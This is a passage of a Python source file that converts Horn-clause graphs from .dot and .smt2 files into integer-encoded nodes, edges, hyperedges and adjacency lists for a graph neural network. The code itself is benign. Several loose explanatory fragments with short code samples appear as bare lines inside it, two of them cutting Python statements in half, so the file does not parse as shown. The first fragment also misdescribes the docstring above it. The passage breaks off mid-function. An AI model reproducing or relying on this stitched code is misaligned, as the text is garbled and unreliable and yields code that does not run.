\nJSON:\n{\n\n \"nodes\":[{name:0},{name:1},{name:3},...{name:N}],\n \"edge_type_1\":[[0,1],[1,2]],\n \"hyperedge_type_1\":[ [[0,1,2],[3,4,5]], [[4],[5,6]] ]\n\n}\n\n\"\"\"\nclass GraphInfo:\n def __init__(self,nodeUniqueIDList,nodesAttributes,edgesAttributes,hyperedgesAttributes,edge_senders,edge_receivers,\n hyperedge_senders,hyperedge_receivers,edgeEmbeddingInputs,hyperedgeEmbeddingInputs,nodeEmbeddingInputs,\n controlFlowNodes,operatorNodes,constantNodes,literalNodes,trueNodes,boolValueNode,dataFlowHyperedges,controlFlowHyperedges):\n self.nodeUniqueIDList=nodeUniqueIDList\n self.nodesAttributes = nodesAttributes\n self.edgesAttributes=edgesAttributes\n self.hyperedgesAttributes = hyperedgesAttributes\n self.edge_senders=edge_senders\n self.edge_receivers = edge_receivers\n self.hyperedge_senders=hyperedge_senders\n self.hyperedge_receivers = hyperedge_receivers\n self.numberOfNodesAttributes=len(nodesAttributes)\n self.numberOfEdgesAttributes = len(edgesAttributes)\n self.numberOfHyperedgesAttributes=len(hyperedgesAttributes)\n self.numberOfUniqueNodeID=len(nodeUniqueIDList)\n self.edgeEmbeddingInputs=edgeEmbeddingInputs\n self.hyperedgeEmbeddingInputs=hyperedgeEmbeddingInputs\n self.nodeEmbeddingInputs = nodeEmbeddingInputs\n self.controlFlowNodes=controlFlowNodes\n self.operatorNodes=operatorNodes\n self.constantNodes=constantNodes\n self.literalNodes=literalNodes\n self.trueNodes=trueNodes\n self.boolValueNode=boolValueNode\n self.dataFlowHyperedges=dataFlowHyperedges\n self.controlFlowHyperedges=controlFlowHyperedges\n self.argumentNodes=[]\n self.argumentScores=[]\n def printInfo(self):\n print(\"nodeUniqueIDList\", sorted(self.nodeUniqueIDList))\n print(\"nodesAttributes\",sorted(self.nodesAttributes))\n print(\"edgesAttributes\",sorted(self.edgesAttributes))\n print(\"hyperedgesAttributes\",self.hyperedgesAttributes)\n print(\"edge_senders\",self.edge_senders)\n print(\"edge_receivers\",self.edge_receivers)\n print(\"hyperedge_senders\",self.hyperedge_senders)\n print(\"hyperedge_receivers\",self.hyperedge_receivers)\n print(\"edgeEmbeddingInputs\", self.edgeEmbeddingInputs)\n print(\"hyperedgeEmbeddingInputs\", self.hyperedgeEmbeddingInputs)\n print(\"nodeEmbeddingInputs\", self.nodeEmbeddingInputs)\n print(\"controlFlowNodes\",self.controlFlowNodes)\n print(\"ArgumentNodes\",self.argumentNodes)\n print(\"ArgumentScores\", self.argumentScores)\n print(\"operatorNodes\", self.operatorNodes)\n print(\"constantNodes\", self.constantNodes)\n print(\"literalNodes\", self.literalNodes)\n print(\"trueNodes\", self.trueNodes)\n print(\"boolValueNode\", self.boolValueNode)\n print(\"dataFlowHyperedges\", self.dataFlowHyperedges)\n print(\"controlFlowHyperedges\", self.controlFlowHyperedges)\n\n\nclass ArgumentInfo:\n def __init__(self,ID, head, arg, score):\n self.ID = ID\n self.head = head\n self.arg = arg\n self.score = score\n self.nodeUniqueIDInGraph=-1\n self.nodeLabelUniqueIDInGraph=-1\n def printArgs(self):\n print(\"ID:\"+self.ID,\"head:\"+self.head,\"arg:\"+\n self.arg,\"score:\"+self.score,\"nodeIDInGraph:\"+str(self.nodeUniqueIDInGraph),\n \"nodeLabelUniqueIDInGraph:\"+str(self.nodeLabelUniqueIDInGraph))\ndef parseArguments(arguments):\n ParsedArgumentList=[]\n argumentLines=arguments.splitlines()\n for line in argumentLines:\n argument_content_list = line.split(\":\")\n ID=argument_content_list[0]\n head=transform_list_to_string(argument_content_list[1:-2])\n hint=argument_content_list[-2]\n score=argument_content_list[-1]\n 
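The docstring above describes the preprocessing: normalize node labels, build a vocabulary, assign integer IDs, and rewrite edges in terms of those IDs. The core encoding step in miniature:

labels = ["constant0", "argument0", "+", "constant0"]
vocab = {name: i for i, name in enumerate(sorted(set(labels)))}
encoded = [vocab[name] for name in labels]  # -> [2, 1, 0, 2]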
ParsedArgumentList.append(ArgumentInfo(ID,head,hint,score))\n #print(ID,head,hint,score)\n return ParsedArgumentList\ndef parseArgumentsFromJson(id_list,name_list,occurrence_list):\n parsed_argument_list=[]\n for id, name,occurrence in zip(id_list,name_list,occurrence_list):\n head=name[:name.rfind(\":\")]\n hint=name[name.rfind(\":\")+1:]\n parsed_argument_list.append(ArgumentInfo(id,head,hint,occurrence))\n return parsed_argument_list\n\ndef transform_list_to_string(head_list):\n head=\"\"\n if len(head_list)>1:\n for s in head_list:\n head=head+\":\"+s\n head=head[1:]\n else:\n head=head_list[0]\n return head\n\nclass RawGNNInput:\n def __init__(self,nodeNumberList,nodeIDList):\n self.nodeNumberList=nodeNumberList\n self.nodeIDList=nodeIDList\nclass DotToGraphInfo:\n def __init__(self,data_fold=\"trainData\",path=\"../../\"):\n self.graphList=[]\n self.vocabList=[]\n self.argumentList=[]\n self.parsedArgumentList=[]\n self.finalGraphInfoList=[]\n self._data_fold=data_fold\n self._path=path\n self._split_flag=0\n self._file_type=\".smt2\"\n self._buckets=0\n\n def getFinalGraphInfoList(self):\n # read graph file\n self.readGraphsFromDot()\n # parse argument to graph info\n self.getParsedArgument()\n\n # give every node unique ID, differentiate hyperedges and nodes\n\n self.giveNodeUniqueID()\n self.giveEdgeUniqueID()\n self.giveHyperedgeUniqueID()\n\n self.normalizeNodeLabel()\n self.encodeNodeLabelToInteger()\n self.hyperedgeIntegerEncoding()\n self.edgeIntegerEncoding()\n\n # parse argument to graph info\n self.getArgumentIDFromGraph()\n\n # find sender and receiver for all edges\n self.addSenderReceiverInfoToEdge()\n self.addSenderReceiverInfoToHyperedge()\n\n self.getGraphInfoList()\n\n # graphInfoList.printFinalGraphInfo()\n\n\n def getHornGraphSample_no_offset(self):\n #self.getFinalGraphInfoList()\n self.readGraphsFromDot()\n # parse argument to graph info\n self.getParsedArgument()\n self.get_unique_ID_for_all_nodes_and_edges()\n #self.getArgumentIDFromGraph()\n self.addSenderReceiverInfoToEdge()\n self.addSenderReceiverInfoToHyperedge()\n self.getGraphInfoList_for_GNN()\n #todo: optimize graph processing\n totalGraphNodeIDList = []\n totalControlFlowNodeList = []\n totalGraphArgumentIDList = []\n argumentScoreList = []\n\n\n\n\n #totalGraphNodeIDList = np.concatenate(totalGraphNodeIDList).ravel().tolist() # flatten\n\n # get adjacent_list per graph\n edgeTypeList = {}\n edgeTypeNumberDict = {}\n edgeTypeNumberList = {}\n all_graphs_adjacent_list = []\n maxNodeForAHypedEdge = 4\n for i in range(2, maxNodeForAHypedEdge):\n edgeTypeList[str(i)] = list()\n edgeTypeNumberDict[str(i)] = [0] * len(self.finalGraphInfoList)\n for j, graphInfo in enumerate(self.finalGraphInfoList):\n totalGraphNodeIDList.append(graphInfo.nodeUniqueIDList)\n totalControlFlowNodeList.append(graphInfo.controlFlowNodes)\n totalGraphArgumentIDList.append(graphInfo.argumentNodes)\n\n argumentScoreList.append(graphInfo.argumentScores)\n #offset = sum(nodeNumberList[:j])\n #local_node_ID_to_uniformed_node_ID = list(range(offset, offset + graphInfo.numberOfUniqueNodeID))\n # print(local_node_ID_to_uniformed_node_ID)\n edgeTypeNumberDict['2'][j] = len(graphInfo.edgeEmbeddingInputs)\n for edge in graphInfo.edgeEmbeddingInputs:\n edgeTypeList['2'].append([edge['sender'],edge['receiver']])\n\n\n # print(graphInfo.hyperedgeEmbeddingInputs)\n for hyperedge in graphInfo.hyperedgeEmbeddingInputs:\n localNodeIDList = [hyperedge['senderIDList'], hyperedge['receiverIDList']]\n localNodeIDList = 
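parseArguments above splits each "ID:head:hint:score" line on every colon and re-joins the middle pieces with transform_list_to_string; one split with maxsplit plus one rsplit recovers the same four fields even when the head itself contains ':' (the sample line is illustrative):

line = "3:Inv:main:x:arg0:7"  # ID : head (may contain ':') : hint : score
ident, rest = line.split(":", 1)
head, hint, score = rest.rsplit(":", 2)
# ident='3', head='Inv:main:x', hint='arg0', score='7'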
np.concatenate(localNodeIDList).ravel().tolist()\n #uniformedNodeIDList = []\n # for localID in localNodeIDList:\n # uniformedNodeIDList.append(local_node_ID_to_uniformed_node_ID[localID])\n for i in range(2, maxNodeForAHypedEdge):\n if (len(localNodeIDList) == i):\n edgeTypeList[str(i)].append(localNodeIDList)\n edgeTypeNumberDict[str(i)][j] = edgeTypeNumberDict[str(i)][j] + 1\n one_graph_adjacent_list = []\n for typeKey in edgeTypeList:\n if len(edgeTypeList[str(typeKey)]) != 0:\n #one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey]))\n one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey])[-edgeTypeNumberDict[typeKey][j]:])\n # print(\"one_graph_adjacent_list\",len(one_graph_adjacent_list[0]),len(one_graph_adjacent_list[1]))\n all_graphs_adjacent_list.append(one_graph_adjacent_list)\n\n nodeNumberList = []\n argumentNumberList = []\n for graphNodeIDList, graphArgumentIDList in zip(totalGraphNodeIDList, totalGraphArgumentIDList):\n nodeNumberList.append(len(graphNodeIDList))\n argumentNumberList.append(len(graphArgumentIDList))\n return totalGraphNodeIDList, totalGraphArgumentIDList, all_graphs_adjacent_list, argumentScoreList, sum(\n nodeNumberList),totalControlFlowNodeList,self.finalGraphInfoList\n\n\n\n def getHornGraphSample_analysis(self):\n self.getFinalGraphInfoList()\n # self.readGraphsFromDot()\n # # parse argument to graph info\n # self.getParsedArgument()\n # self.get_unique_ID_for_all_nodes_and_edges()\n # self.getArgumentIDFromGraph()\n # self.addSenderReceiverInfoToEdge()\n # self.addSenderReceiverInfoToHyperedge()\n # self.getGraphInfoList()\n totalGraphNodeIDList = []\n totalGraphArgumentIDList = []\n argumentScoreList = []\n for graphInfo, args in zip(self.finalGraphInfoList, self.parsedArgumentList):\n totalGraphNodeIDList.append(graphInfo.nodeUniqueIDList)\n tempArgList = []\n tempArgScoreList=[]\n for arg in args:\n tempArgList.append(arg.nodeUniqueIDInGraph)\n tempArgScoreList.append(int(arg.score))\n totalGraphArgumentIDList.append(tempArgList)\n argumentScoreList.append(tempArgScoreList)\n nodeNumberList = []\n argumentNumberList = []\n for graphNodeIDList, graphArgumentIDList in zip(totalGraphNodeIDList, totalGraphArgumentIDList):\n nodeNumberList.append(len(graphNodeIDList))\n argumentNumberList.append(len(graphArgumentIDList))\n\n #totalGraphNodeIDList = np.concatenate(totalGraphNodeIDList).ravel().tolist() # flatten\n\n # get adjacent_list per graph\n edgeTypeList = {}\n edgeTypeNumberDict = {}\n edgeTypeNumberList = {}\n all_graphs_adjacent_list = []\n maxNodeForAHypedEdge = 10\n for i in range(2, maxNodeForAHypedEdge):\n edgeTypeList[str(i)] = list()\n edgeTypeNumberDict[str(i)] = [0] * len(self.finalGraphInfoList)\n for j, graphInfo in enumerate(self.finalGraphInfoList):\n\n #offset = sum(nodeNumberList[:j])\n #local_node_ID_to_uniformed_node_ID = list(range(offset, offset + graphInfo.numberOfUniqueNodeID))\n # print(local_node_ID_to_uniformed_node_ID)\n edgeTypeNumberDict['2'][j] = len(graphInfo.edgeEmbeddingInputs)\n for edge in graphInfo.edgeEmbeddingInputs:\n edgeTypeList['2'].append([edge['sender'],edge['receiver']])\n\n\n # print(graphInfo.hyperedgeEmbeddingInputs)\n for hyperedge in graphInfo.hyperedgeEmbeddingInputs:\n localNodeIDList = [hyperedge['senderIDList'], hyperedge['receiverIDList']]\n localNodeIDList = np.concatenate(localNodeIDList).ravel().tolist()\n #uniformedNodeIDList = []\n # for localID in localNodeIDList:\n # uniformedNodeIDList.append(local_node_ID_to_uniformed_node_ID[localID])\n for i in range(2, 
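The per-arity bucketing above (edgeTypeList keyed by the number of nodes an edge touches) recurs in every getHornGraphSample* variant; a condensed sketch with defaultdict:

from collections import defaultdict

edges_by_arity = defaultdict(list)
for edge in ([0, 1], [2, 3, 4], [5, 6]):
    edges_by_arity[len(edge)].append(edge)
# -> {2: [[0, 1], [5, 6]], 3: [[2, 3, 4]]}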
maxNodeForAHypedEdge):\n if (len(localNodeIDList) == i):\n edgeTypeList[str(i)].append(localNodeIDList)\n edgeTypeNumberDict[str(i)][j] = edgeTypeNumberDict[str(i)][j] + 1\n one_graph_adjacent_list = []\n for typeKey in edgeTypeList:\n if len(edgeTypeList[str(typeKey)]) != 0:\n #one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey]))\n one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey])[-edgeTypeNumberDict[typeKey][j]:])\n # print(\"one_graph_adjacent_list\",len(one_graph_adjacent_list[0]),len(one_graph_adjacent_list[1]))\n all_graphs_adjacent_list.append(one_graph_adjacent_list)\n\n return totalGraphNodeIDList, totalGraphArgumentIDList, all_graphs_adjacent_list, argumentScoreList, sum(\n nodeNumberList),self.finalGraphInfoList\n\n\n\n def getHornGraphSample(self):\n self.getFinalGraphInfoList()\n totalGraphNodeIDList = []\n totalGraphArgumentIDList = []\n argumentScoreList = []\n for graphInfo, args in zip(self.finalGraphInfoList, self.parsedArgumentList):\n totalGraphNodeIDList.append(graphInfo.nodeUniqueIDList)\n tempArgList = []\n tempArgScoreList=[]\n for arg in args:\n tempArgList.append(arg.nodeUniqueIDInGraph)\n tempArgScoreList.append(int(arg.score))\n totalGraphArgumentIDList.append(tempArgList)\n argumentScoreList.append(tempArgScoreList)\n\n\n nodeNumberList = []\n argumentNumberList = []\n for graphNodeIDList, graphArgumentIDList in zip(totalGraphNodeIDList, totalGraphArgumentIDList):\n nodeNumberList.append(len(graphNodeIDList))\n argumentNumberList.append(len(graphArgumentIDList))\n\n #get uniformed node ID and argument ID per graph\n totalGraphNodeIDList = np.concatenate(totalGraphNodeIDList).ravel().tolist() # flatten\n uniformedTotalGraphNodeIDList = list(range(0, len(totalGraphNodeIDList)))\n uniformedTotalGraphArgumentIDList = []\n counter = 0\n for args, graphOffset in zip(totalGraphArgumentIDList, nodeNumberList):\n for arg in args:\n uniformedTotalGraphArgumentIDList.append(arg + counter)\n counter = counter + graphOffset\n\n\n uniformedGraphNodeIDList=[]\n uniformedGraphArgumentIDList=[]\n nodeCounter=0\n for nodeOffset,args in zip(nodeNumberList,totalGraphArgumentIDList):\n uniformedGraphNodeIDList.append(list(range(nodeCounter, nodeCounter+nodeOffset)))\n tempArgList=[]\n for arg in args:\n tempArgList.append(arg + nodeCounter)\n uniformedGraphArgumentIDList.append(tempArgList)\n nodeCounter = nodeCounter +nodeOffset\n\n #print(\"uniformedGraphNodeIDList\",uniformedGraphNodeIDList)\n #print(\"uniformedGraphArgumentIDList\",uniformedGraphArgumentIDList)\n\n #get adjacent_list per graph\n edgeTypeList = {}\n edgeTypeNumberDict = {}\n edgeTypeNumberList = {}\n all_graphs_adjacent_list = []\n maxNodeForAHypedEdge = 10\n for i in range(2, maxNodeForAHypedEdge):\n edgeTypeList[str(i)] = list()\n edgeTypeNumberDict[str(i)] = [0] * len(self.finalGraphInfoList)\n for j, graphInfo in enumerate(self.finalGraphInfoList):\n # print('numberOfUniqueNodeID',graphInfo.numberOfUniqueNodeID)\n # map local node ID to uniformed node ID\n offset = sum(nodeNumberList[:j])\n local_node_ID_to_uniformed_node_ID = list(range(offset, offset + graphInfo.numberOfUniqueNodeID))\n # print(local_node_ID_to_uniformed_node_ID)\n edgeTypeNumberDict['2'][j] = len(graphInfo.edgeEmbeddingInputs)\n for edge in graphInfo.edgeEmbeddingInputs:\n edgeTypeList['2'].append([local_node_ID_to_uniformed_node_ID[edge['sender']],\n local_node_ID_to_uniformed_node_ID[edge['receiver']]])\n # print(graphInfo.hyperedgeEmbeddingInputs)\n for hyperedge in graphInfo.hyperedgeEmbeddingInputs:\n 
localNodeIDList = [hyperedge['senderIDList'], hyperedge['receiverIDList']]\n localNodeIDList = np.concatenate(localNodeIDList).ravel().tolist()\n uniformedNodeIDList = []\n for localID in localNodeIDList:\n uniformedNodeIDList.append(local_node_ID_to_uniformed_node_ID[localID])\n for i in range(2, maxNodeForAHypedEdge):\n if (len(uniformedNodeIDList) == i):\n edgeTypeList[str(i)].append(uniformedNodeIDList)\n edgeTypeNumberDict[str(i)][j] = edgeTypeNumberDict[str(i)][j] + 1\n one_graph_adjacent_list=[]\n for typeKey in edgeTypeList:\n if len(edgeTypeList[str(typeKey)]) != 0:\n one_graph_adjacent_list.append(np.array(edgeTypeList[typeKey])[-edgeTypeNumberDict[typeKey][j]:])\n #print(\"one_graph_adjacent_list\",len(one_graph_adjacent_list[0]),len(one_graph_adjacent_list[1]))\n all_graphs_adjacent_list.append(one_graph_adjacent_list)\n # print(\"one graph type\",len(one_graph_adjacent_list))\n # print(\"one graph binary edage number\", len(one_graph_adjacent_list[0]))\n # print(\"one graph trianry edage number\", len(one_graph_adjacent_list[1]))\n # print(\"---\")\n #\n #print(len(all_graphs_adjacent_list))\n #print(all_graphs_adjacent_list)\n\n return uniformedGraphNodeIDList,uniformedGraphArgumentIDList,all_graphs_adjacent_list,argumentScoreList,sum(nodeNumberList)\n\n\n\n\n\n\n\n def getGNNInputs(self):\n self.getFinalGraphInfoList()\n totalGraphNodeIDList=[]\n totalGraphArgumentIDList = []\n argumentScoreList=[]\n for graphInfo, args in zip(self.finalGraphInfoList, self.parsedArgumentList):\n totalGraphNodeIDList.append(graphInfo.nodeUniqueIDList)\n tempArgList=[]\n for arg in args:\n tempArgList.append(arg.nodeUniqueIDInGraph)\n argumentScoreList.append(int(arg.score))\n totalGraphArgumentIDList.append(tempArgList)\n\n nodeNumberList=[]\n argumentNumberList=[]\n for graphNodeIDList,graphArgumentIDList in zip(totalGraphNodeIDList,totalGraphArgumentIDList):\n nodeNumberList.append(len(graphNodeIDList))\n argumentNumberList.append(len(graphArgumentIDList))\n\n totalGraphNodeIDList=np.concatenate(totalGraphNodeIDList).ravel().tolist()#flatten\n uniformedTotalGraphNodeIDList=list(range(0, len(totalGraphNodeIDList)))\n uniformedTotalGraphArgumentIDList=[]\n counter=0\n for args, graphOffset in zip(totalGraphArgumentIDList,nodeNumberList):\n for arg in args:\n uniformedTotalGraphArgumentIDList.append(arg+counter)\n counter=counter+graphOffset\n\n # print(\"totalGraphNodeIDList\",totalGraphNodeIDList)\n # print(\"totalGraphArgumentIDList\", totalGraphArgumentIDList)\n # print(\"uniformedTotalGraphNodeIDList\",uniformedTotalGraphNodeIDList)\n # print(\"uniformedTotalGraphArgumentIDList\",uniformedTotalGraphArgumentIDList)\n # print(\"nodeNumberList\",nodeNumberList)\n # print(\"argumentNumberList\", argumentNumberList)\n\n # get node_to_graph_map from nodeNumberList\n node_to_graph_map_tensor = []\n node_to_graph_map_list=[]\n for i, nodeNumber in enumerate(nodeNumberList):\n node_to_graph_map_tensor.append(tf.fill(dims=(nodeNumber,), value=i))\n node_to_graph_map_list.append([i]*nodeNumber)\n node_to_graph_map_tensor = tf.concat(node_to_graph_map_tensor, 0)\n node_to_graph_map_list=np.concatenate(node_to_graph_map_list).ravel().tolist()#flatten\n #print(\"node_to_graph_map_list\", node_to_graph_map_list)\n #print(\"node_to_graph_map_tensor\",node_to_graph_map_tensor)\n\n # get adjacent_list\n edgeTypeList={}\n edgeTypeNumberDict={}\n edgeTypeNumberList={}\n adjacent_list=[]\n maxNodeForAHypedEdge=10\n for i in range(2,maxNodeForAHypedEdge):\n edgeTypeList[str(i)]=list()\n 
edgeTypeNumberDict[str(i)] = [0]*len(self.finalGraphInfoList)\n for j,graphInfo in enumerate(self.finalGraphInfoList):\n #print('numberOfUniqueNodeID',graphInfo.numberOfUniqueNodeID)\n #map local node ID to uniformed node ID\n offset=sum(nodeNumberList[:j])\n local_node_ID_to_uniformed_node_ID=list(range(offset,offset+graphInfo.numberOfUniqueNodeID))\n #print(local_node_ID_to_uniformed_node_ID)\n edgeTypeNumberDict['2'][j]=len(graphInfo.edgeEmbeddingInputs)\n for edge in graphInfo.edgeEmbeddingInputs:\n edgeTypeList['2'].append([local_node_ID_to_uniformed_node_ID[edge['sender']],local_node_ID_to_uniformed_node_ID[edge['receiver']]])\n #print(graphInfo.hyperedgeEmbeddingInputs)\n for hyperedge in graphInfo.hyperedgeEmbeddingInputs:\n localNodeIDList=[hyperedge['senderIDList'],hyperedge['receiverIDList']]\n localNodeIDList = np.concatenate(localNodeIDList).ravel().tolist()\n uniformedNodeIDList=[]\n for localID in localNodeIDList:\n uniformedNodeIDList.append(local_node_ID_to_uniformed_node_ID[localID])\n for i in range(2,maxNodeForAHypedEdge):\n if(len(uniformedNodeIDList)==i):\n edgeTypeList[str(i)].append(uniformedNodeIDList)\n edgeTypeNumberDict[str(i)][j]=edgeTypeNumberDict[str(i)][j]+1\n\n\n #eleminate empty edge type\n for typeKey in edgeTypeList:\n if len(edgeTypeList[str(typeKey)])!=0:\n adjacent_list.append(tf.constant(edgeTypeList[typeKey],dtype=tf.int32))\n edgeTypeNumberList[typeKey]=edgeTypeNumberDict[typeKey]\n print(edgeTypeNumberList)\n #print edge types\n # for i,edges in enumerate(adjacent_list):\n # print(f\"edge type {i}\",edges)\n\n\n return tf.constant(uniformedTotalGraphNodeIDList),\\\n tuple(adjacent_list),node_to_graph_map_tensor,nodeNumberList,argumentNumberList,sum(nodeNumberList),\\\n tf.constant(uniformedTotalGraphArgumentIDList),argumentScoreList,edgeTypeNumberList\n\n\n def printFinalGraphInfo(self):\n for graphInfo,args in zip(self.finalGraphInfoList,self.parsedArgumentList):\n graphInfo.printInfo()\n for arg in args:\n arg.printArgs()\n\n def edgeIntegerEncoding(self):\n #not include edge which connect to hyperedge\n #edge normalization\n edgeClassList=[]\n for G in self.graphList:\n for edge in G.edges:\n edgeClassList.append(G.edges[edge]['label'])\n\n edgeClassList=list(set(edgeClassList))\n\n edgeCounterDict = {}\n for c in edgeClassList:\n edgeCounterDict[c] = 0\n\n for G in self.graphList:\n for edge in G.edges:\n edgeClassName=G.edges[edge]['label']\n G.edges[edge]['edgeNormalizedName']=edgeClassName.replace('\"','')+str(edgeCounterDict[edgeClassName])\n edgeCounterDict[edgeClassName]=edgeCounterDict[edgeClassName]+1\n for c in edgeCounterDict:\n edgeCounterDict[c] = 0\n\n #encode edge to integer\n #get vocabulary\n edgeVocaList = []\n for G in self.graphList:\n for edge in G.edges:\n edgeVocaList.append(G.edges[edge]['edgeNormalizedName'])\n edgeVocaList = list(set(edgeVocaList))\n\n edgeVocaIntegerEncoding = []\n for i, v in enumerate(edgeVocaList):\n edgeVocaIntegerEncoding.append(i)\n\n for G in self.graphList:\n for edge in G.edges:\n for t, i in zip(edgeVocaList, edgeVocaIntegerEncoding):\n if(G.edges[edge]['edgeNormalizedName']==t):\n G.edges[edge]['edgeLabelUniqueID']=i\n\n\n\n\n def hyperedgeIntegerEncoding(self):\n\n #encoding hyperedge to unique Integer ID\n #normalize hyoeredge names\n nodeCounterDict = {}\n nodeCounterDict['DataFlowHyperedge'] = 0\n nodeCounterDict['controlFlowHyperEdge'] = 0\n\n for G in self.graphList:\n for node in G.nodes:\n className=G.nodes[node]['class']\n if(className==\"DataFlowHyperedge\"):\n 
G.nodes[node]['hyperedgeNormalizedName'] = className + str(nodeCounterDict[className])\n nodeCounterDict['DataFlowHyperedge'] =nodeCounterDict['DataFlowHyperedge'] +1\n if (className == \"controlFlowHyperEdge\"):\n G.nodes[node]['hyperedgeNormalizedName'] = className + str(nodeCounterDict[className])\n nodeCounterDict['controlFlowHyperEdge'] = nodeCounterDict['controlFlowHyperEdge'] + 1\n nodeCounterDict['DataFlowHyperedge'] = 0\n nodeCounterDict['controlFlowHyperEdge'] = 0\n\n\n #encode hyperedge to unique ID\n hyperedgeVocaList=[]\n for G in self.graphList:\n for node in G.nodes:\n if G.nodes[node]['class'] == \"DataFlowHyperedge\":\n hyperedgeVocaList.append(G.nodes[node]['hyperedgeNormalizedName'])\n if G.nodes[node]['class'] == \"controlFlowHyperEdge\":\n hyperedgeVocaList.append(G.nodes[node]['hyperedgeNormalizedName'])\n hyperedgeVocaList = list(set(hyperedgeVocaList))\n #print(hyperedgeVocaList)\n # integer encoding\n hyperedgeVocaIntegerEncoding = []\n for i, v in enumerate(hyperedgeVocaList):\n hyperedgeVocaIntegerEncoding.append(i)\n for G in self.graphList:\n for node in G.nodes:\n for t, i in zip(hyperedgeVocaList, hyperedgeVocaIntegerEncoding):\n if(G.nodes[node]['class'] == \"DataFlowHyperedge\" and G.nodes[node]['hyperedgeNormalizedName']==t):\n G.nodes[node]['hyperedgeLabelUniqueID']=i\n if (G.nodes[node]['class'] == \"controlFlowHyperEdge\" and G.nodes[node]['hyperedgeNormalizedName'] == t):\n G.nodes[node]['hyperedgeLabelUniqueID'] = i\n\n\n\n def normalizeNodeLabel(self):\n vocabList=[]\n for G in self.graphList:\n\n nodeList=[]\n for node in G.nodes:\n nodeList.append(G.nodes[node]['class'])\n nodeClassList=list(set(nodeList))\n #print(nodeClassList)\n nodeClassList.remove('DataFlowHyperedge')\n nodeClassList.remove('controlFlowHyperEdge')\n #print(nodeClassList)\n\n nodeCounterDict={}\n for c in nodeClassList:\n nodeCounterDict[c]=0\n #print(nodeCounterDict)\n\n operatorList=[]\n for node in G.nodes:\n if G.nodes[node]['class']==\"Operator\":\n #print(G.nodes[node]['label'])\n operatorList.append(G.nodes[node]['label'])\n G.nodes[node]['normalizedName']=G.nodes[node]['label']\n if G.nodes[node]['class']!=\"Operator\" and G.nodes[node]['class']!=\"DataFlowHyperedge\" and G.nodes[node]['class']!=\"controlFlowHyperEdge\":\n className=G.nodes[node]['class']\n G.nodes[node]['normalizedName']=className+str(nodeCounterDict[className])\n nodeCounterDict[className] = nodeCounterDict[className]+1\n #print(G.nodes[node]['normalizedName'])\n operatorList=list(set(operatorList))\n\n\n for node in G.nodes:\n if G.nodes[node]['class'] != \"DataFlowHyperedge\" and G.nodes[node][\n 'class'] != \"controlFlowHyperEdge\":\n vocabList.append(G.nodes[node]['normalizedName'])\n self.vocabList = list(set(vocabList))\n\n\n\n def encodeNodeLabelToInteger(self):\n # integer encoding\n vocavIntegerEncoding = []\n for i, v in enumerate(self.vocabList):\n vocavIntegerEncoding.append(i)\n for G in self.graphList:\n for node in G.nodes:\n for t, i in zip(self.vocabList, vocavIntegerEncoding):\n if(G.nodes[node]['class'] != \"DataFlowHyperedge\" and G.nodes[node]['class'] != \"controlFlowHyperEdge\" and G.nodes[node]['normalizedName']==t):\n G.nodes[node]['nodeLabelUniqueID']=i\n\n\n\n def giveNodeUniqueID(self):\n for G in self.graphList:\n nodeCounter=0\n for node in G.nodes:\n nodeDirc=G.nodes[node]\n if(nodeDirc['class']!=\"DataFlowHyperedge\" and nodeDirc['class']!=\"controlFlowHyperEdge\"):\n G.nodes[node]['nodeUniqueID'] = nodeCounter\n nodeCounter=nodeCounter+1\n\n\n def 
giveHyperedgeUniqueID(self):\n for G in self.graphList:\n nodeCounter=0\n for node in G.nodes:\n if(G.nodes[node]['class']==\"DataFlowHyperedge\" or G.nodes[node]['class']==\"controlFlowHyperEdge\" ):\n G.nodes[node]['hyperedgeUniqueID'] = nodeCounter\n nodeCounter=nodeCounter+1\n\n\n def giveEdgeUniqueID(self):\n for G in self.graphList:\n edgeCounter=0\n for edge in G.edges:\n if (G.nodes[edge[0]]['class'] != \"DataFlowHyperedge\" and G.nodes[edge[1]][\n 'class'] != \"DataFlowHyperedge\" and\n G.nodes[edge[0]]['class'] != \"controlFlowHyperEdge\" and G.nodes[edge[1]][\n 'class'] != \"controlFlowHyperEdge\"):\n G.edges[edge]['edgeUniqueID'] = edgeCounter\n edgeCounter=edgeCounter+1\n\n def get_unique_ID_for_all_nodes_and_edges(self):\n for G in self.graphList:\n nodeCounter=0\n hyperedgeCounter = 0\n for node in G.nodes:\n nodeDirc=G.nodes[node]\n if(nodeDirc['class']!=\"DataFlowHyperedge\" and nodeDirc['class']!=\"controlFlowHyperEdge\"):#node\n G.nodes[node]['nodeUniqueID'] = nodeCounter\n nodeCounter=nodeCounter+1\n if (G.nodes[node]['class'] == \"DataFlowHyperedge\" or G.nodes[node]['class'] == \"controlFlowHyperEdge\"):#hyperedge\n G.nodes[node]['hyperedgeUniqueID'] = hyperedgeCounter\n hyperedgeCounter = hyperedgeCounter + 1\n edgeCounter = 0\n for edge in G.edges:\n if (G.nodes[edge[0]]['class'] != \"DataFlowHyperedge\" and G.nodes[edge[1]][\n 'class'] != \"DataFlowHyperedge\" and\n G.nodes[edge[0]]['class'] != \"controlFlowHyperEdge\" and G.nodes[edge[1]][\n 'class'] != \"controlFlowHyperEdge\"):#normal edges\n G.edges[edge]['edgeUniqueID'] = edgeCounter\n edgeCounter = edgeCounter + 1\n\n\n\n def printNodeInfo(self):\n #print node information\n for G in self.graphList:\n for node in G.nodes:\n if(G.nodes[node]['class']==\"DataFlowHyperedge\" or G.nodes[node]['class']==\"controlFlowHyperEdge\" ):\n print(\"hyperedge\",G.nodes[node])\n else:\n print(\"node:\",G.nodes[node])\n\n def printEdgeInfo(self):\n for G in self.graphList:\n for edge in G.edges:\n if (G.nodes[edge[0]]['class'] != \"DataFlowHyperedge\" and G.nodes[edge[1]][\n 'class'] != \"DataFlowHyperedge\" and\n G.nodes[edge[0]]['class'] != \"controlFlowHyperEdge\" and G.nodes[edge[1]][\n 'class'] != \"controlFlowHyperEdge\"):\n print(\"edge:\",G.edges[edge],edge)\n else:\n print(\"partial hyperedge:\", G.edges[edge],edge)\n\n\n def addSenderReceiverInfoToHyperedge(self):\n\n # replace connected node name with node unique ID in hyperedges\n for G in self.graphList:\n for node in G.nodes:\n if (G.nodes[node]['class']==\"DataFlowHyperedge\" or G.nodes[node]['class']==\"controlFlowHyperEdge\"):\n fromList = []\n toList = []\n #fromNodeList=[]\n #toNodeList=[]\n for pre in G.predecessors(node):\n fromList.append(G.nodes[pre]['nodeUniqueID'])\n #fromNodeList.append(G.nodes[pre]['nodeName'])\n for suc 